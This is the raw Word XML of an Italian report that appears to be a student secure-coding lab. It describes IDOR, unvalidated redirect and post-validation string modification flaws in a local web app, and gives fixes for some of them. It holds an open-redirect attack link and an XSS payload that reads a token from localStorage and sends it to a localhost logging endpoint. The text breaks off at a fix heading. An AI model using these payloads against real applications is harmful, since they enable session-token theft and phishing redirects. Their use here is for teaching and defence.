          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00631FB1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">irect </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00631FB1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">bject </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00631FB1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eferences (IDOR)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C796C9" w14:textId="1814A638" w:rsidR="00FA683C" w:rsidRDefault="00FA683C" w:rsidP="00BC247B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questa vulnerabilità nasce quando l’utente può accedere o modificare gli oggetti manipolando l’id,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70166C5" w:rsidR="00BC247B" w:rsidRDefault="00FA683C" w:rsidP="00BC247B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In questo esempio</w:t>
      </w:r>
      <w:r w:rsidR="00BC247B">
        <w:t xml:space="preserve"> è stato modificato il metodo /client che prima cercava per username e ora cerca per id in modo tale che modificando l’ID con il successivo posso ottenere i dati di un altro utente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DADFC0" w14:textId="1E17C283" w:rsidR="005E7293" w:rsidRPr="00BC247B" w:rsidRDefault="00BC247B" w:rsidP="00BC247B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED8E9DF" w14:textId="18147C20" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3DD26C10" w14:textId="54500E7C" w:rsidR="00DE7E9C" w:rsidRDefault="00DE7E9C" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66FAD8A8" wp14:editId="779AD8DF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-418465</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4960620" cy="344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620" cy="3449320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>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49156F43" w14:textId="5E09BEAD" w:rsidR="005E7293" w:rsidRDefault="00C87C03" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251701248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13C64539" wp14:editId="36E4EACF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>89535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7057390" cy="10033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7390" cy="1003300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6B2CBA" w14:textId="2061ABD5" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1AB186CD" w14:textId="3A08ED7D" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6D0C3B38" w14:textId="34F58349" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4992377C" w14:textId="2E39B94B" w:rsidR="005E7293" w:rsidRDefault="00C87C03" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A9A2F16" wp14:editId="175182C2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-540385</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>94615</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2AE3750A" w14:textId="6574003B" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="73E53840" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4AF4AA95" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="00377ACC" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2C48B657" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6197C124" w14:textId="41967704" w:rsidR="005E7293" w:rsidRDefault="006C2D8D" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Fix: si può usare la versione originale dove la </w:t>
      </w:r>
      <w:r w:rsidR="00350E38">
        <w:t>GET viene</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fatta per username e non per id. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF9DCA" w14:textId="08C2A738" w:rsidR="005E7293" w:rsidRDefault="00350E38" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C1DCCE6" wp14:editId="6985B91F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>25400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4057015" cy="2867243"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="962003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015" cy="2867243"/>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77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="45133DFF" w14:textId="644E1394" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="021C06EC" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6FB3B579" w14:textId="3F55B623" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7BA4859D" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2A7A3A0C" w14:textId="11993C6A" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="720CFBDC" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1FE5C372" w14:textId="24E4A14E" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02FEBF17" wp14:editId="2539B253">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-481965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6856296" cy="2051884"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
            <wp:wrapNone/>
            <wp:docPr id="19492329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6296" cy="2051884"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A66DB7F" w14:textId="163F821B" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="28E73157" w14:textId="5FEBE42F" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="25B0852F" w14:textId="5D557B01" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="084D97BB" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="78B3699C" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="329D2FDB" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="73212B9D" w14:textId="49C3AFA5" w:rsidR="00FF363E" w:rsidRDefault="005F7CDE" w:rsidP="00FF363E">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Unvalidated redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54680F06" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRPr="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00D03FA6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4F7A44" w14:textId="13271EAB" w:rsidR="00FF363E" w:rsidRDefault="00FF363E" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:t>È un attacco possibile quando un’applicazione web accetta input non validati che possono far si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40709DC0" w14:textId="3B60A990" w:rsidR="005333DB" w:rsidRDefault="00FF363E" w:rsidP="00D03FA6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:t>In questo esempio l</w:t>
      </w:r>
      <w:r w:rsidR="005F7CDE">
        <w:t>’attacco consiste nell’inviare un url in cui l’utente viene indirizzato a una pagina di login dove si può specificare tramite il parametro back l’url a cui ritornare dopo aver fatto il login. Se l’url non è validato, si può sostituire con uno malevolo. Il link da inviare</w:t>
      </w:r>
      <w:r w:rsidR="005333DB">
        <w:t xml:space="preserve"> a un utente per fare l’attacco</w:t>
      </w:r>
      <w:r w:rsidR="005F7CDE">
        <w:t xml:space="preserve">è il seguente: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266CC703" w14:textId="77777777" w:rsidR="005333DB" w:rsidRDefault="005333DB" w:rsidP="00D03FA6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F9775B" w14:textId="0655D8DA" w:rsidR="00FF363E" w:rsidRDefault="005F7CDE" w:rsidP="00D03FA6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r w:rsidRPr="005F7CDE">
        <w:t>http://localhost:4200/login?back=sito malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33315ECC" w14:textId="77777777" w:rsidR="00FF363E" w:rsidRDefault="00FF363E" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE8A3F6" w14:textId="664CCA70" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:t>ProtectedRoutesUser</w:t>
      </w:r>
      <w:r w:rsidR="00335218">
        <w:t>.jsx</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A817920" w14:textId="37E8C4C0" w:rsidR="005F7CDE" w:rsidRDefault="00D03FA6" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251703296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="708B5559" wp14:editId="34AAC7C7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>876935</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>121920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4366260" cy="2302510"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapNone/>
            <wp:docPr id="21989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6260" cy="2302510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5152AF" w14:textId="701A3178"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4A654228" w:rsidR="00D03FA6" w:rsidRPr="005F7CDE" w:rsidRDefault="00D03FA6" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593A9907" w14:textId="77777777"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16EA0687" w14:textId="52D696C9" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="222A9BC1" w14:textId="57A3BC31" w:rsidR="00335218" w:rsidRDefault="005333DB" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251704320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36D73B81" wp14:editId="3F77929F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>241935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3779282" cy="301415"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="2319102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9282" cy="301415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00335218">
        <w:t>Login.jsx:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2993B2F5" w14:textId="4BA36D45" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="48D4A36B" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC">
      <w:r>
        <w:t>LoginService</w:t>
      </w:r>
      <w:r w:rsidR="00335218">
        <w:t>.jsx</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F032F9" w14:textId="75FEBE3A" w:rsidR="005E7293" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251705344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5DA2168C" wp14:editId="06A049A4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-535940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3382645" cy="4330942"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="11331708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2645" cy="4330942"/>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5206AC41" w14:textId="231FDAE0" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="781816BA" w14:textId="25A16749" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="075EA571" w14:textId="14F38C39" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1F31124B" w14:textId="31A11D38" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2AEF0778" w14:textId="41D9BE23" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6D9B8CF4" w14:textId="7F226F59" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2F705EA3" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="53064ED3" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1C3EF95B" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5AD3CFE7" w14:textId="125E5439" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="498761E3" w14:textId="45CB68E4" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7267B871" w14:textId="3D41BA27" w:rsidR="00FF363E" w:rsidRDefault="00861705" w:rsidP="00467BBC">
      <w:r>
        <w:t>Fix: bisogna validare il dominio a cui si viene reindirizzati. Se si da un dominio sbagliato si viene indirizzati comunque alla home del sito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED334B9" w14:textId="1D8F4FEC" w:rsidR="00861705" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1EA73528" wp14:editId="23CEF0FB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3954145" cy="4937760"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10512298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3853" b="6973"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="395414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2F3833CA"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75DF6C1B" w14:textId="5EEDD732" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="090F255C" w14:textId="2FB829E8" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="466E991E" w14:textId="084ED87E" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5C80298A" w14:textId="77777777" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7F8AA5C1" w14:textId="3D8C4F71" w:rsidR="00296FF5" w:rsidRPr="00296FF5" w:rsidRDefault="00825307" w:rsidP="00296FF5">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Performing string modification after validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E69C657" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6"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una stringa viene modificata dopo essere stata validata, creando la possibilità che tale stringa diventi malevola soltanto dopo la modifica e bypassando quindi la validazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35080A7D" w14:textId="636D1E8C" w:rsidR="00825307"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Payload da inviare:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A979B09" w14:textId="77777777" w:rsidR="00296FF5" w:rsidRDefault="00296FF5" w:rsidP="00296FF5">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A637D83" w14:textId="530EC296" w:rsidR="00FF363E" w:rsidRDefault="00072AFB" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r w:rsidRPr="00072AFB">
        <w:t>&lt;s-cript&gt;&lt;img title="&lt;/script&gt;&lt;img src onerror=" var token = localStorage.getItem('token'); var img = new Image(); img.src = 'http://localhost:3000/log?token=' + encodeURIComponent(token); "&gt;"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21597DC6" w14:textId="77777777" w:rsidR="00FF363E" w:rsidRDefault="00FF363E" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705EBACF" w14:textId="77777777" w:rsidR="00FF363E" w:rsidRDefault="00FF363E" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110259A7" w14:textId="07C497AC" w:rsidR="00825307" w:rsidRDefault="00825307" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r w:rsidRPr="009A1CD7">
        <w:t>Hobb</w:t>
      </w:r>
      <w:r w:rsidR="003E3234" w:rsidRPr="009A1CD7">
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="009A1CD7">
        <w:t>Controller</w:t>
      </w:r>
      <w:r>
        <w:t>.java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AF26FD" w14:textId="784BDEE3" w:rsidR="00825307" w:rsidRDefault="00825307" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C568D8A" w14:textId="53D4B2B7" w:rsidR="00825307" w:rsidRPr="006A185C" w:rsidRDefault="00072AFB" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251730944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B75CE59" wp14:editId="4BDEF2FE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6108665" cy="4127766"/>
            <wp:effectExtent l="0" t="0" r="698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8665" cy="4127766"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00825307">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E49AC" w14:textId="64D5C750" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2490A340" w14:textId="0271F408" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5FC7E457" w14:textId="5925CEDD" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2F8B95EE" w14:textId="73601544"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7503D4C9" w14:textId="55A93F0A" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3D8C0E26" w14:textId="48FC2BCD" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5E1B99BD" w14:textId="261ACEF1" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="03E35325" w14:textId="532B2A04" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="541FF50D" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7D68F4C9" w14:textId="1E25E000" w:rsidR="005F7CDE" w:rsidRDefault="003E3234" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Fix: </w:t>
      </w:r>
      <w:r w:rsidR="00617F11">
